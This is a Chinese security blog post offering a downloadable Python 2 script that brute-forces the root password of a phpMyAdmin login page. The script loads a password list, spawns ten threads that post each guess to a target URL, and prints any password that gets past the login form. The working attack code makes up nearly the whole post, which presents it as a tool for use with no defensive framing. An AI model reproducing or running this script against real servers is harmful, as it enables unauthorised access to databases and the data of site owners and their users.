phpmyadmin枚举工具


Nov 09 2017

phpmyadmin枚举工具

首页 » 神器下载 » phpmyadmin枚举工具   

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: IcySun
# 脚本功能:暴力破解phpMyadmin密码

from Queue import Queue
import threading,sys
import requests

def use():
    print '#' * 50
    print '\t Crack Phpmyadmin root\'s pass'
    print '\t\t\t Code By: IcySun'
    print '\t python crackPhpmyadmin.py http://xx.com/phpmyadmin/ \n\t    (default user is root)'


    print '#' * 50

def crack(password):
    global url
    payload = {'pma_username': 'root', 'pma_password': password}
    headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
    r = requests.post(url, headers = headers, data = payload)
    if 'name="login_form"' not in r.content:
        print '[*] OK! Have Got The Pass ==> %s' % password

class MyThread(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
    def run(self):
        global queue
        while not queue.empty():
            password = queue.get()
            crack(password)

def main():
    global url,password,queue
    queue = Queue()
    url = sys.argv[1]
    passlist = open('password.txt','r')
    for password in passlist.readlines():
        password = password.strip()
        queue.put(password)

    for i in range(10):
        c = MyThread()
        c.start()

if __name__ == '__main__':
    if len(sys.argv) != 2 :
        use()
    else:
        main()


1.png

phpmyadmin.zip

如果您喜欢本博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容:

正文部分到此结束

文章标签:这篇文章木有标签

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «Foosun DotNetCMS2.0登录绕过漏洞 | Python3编写的CMS漏洞检测工具(含300POC)»

你肿么看?

你还可以输入 250/250 个字

 微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

这篇文章还没有收到评论,赶紧来抢沙发吧~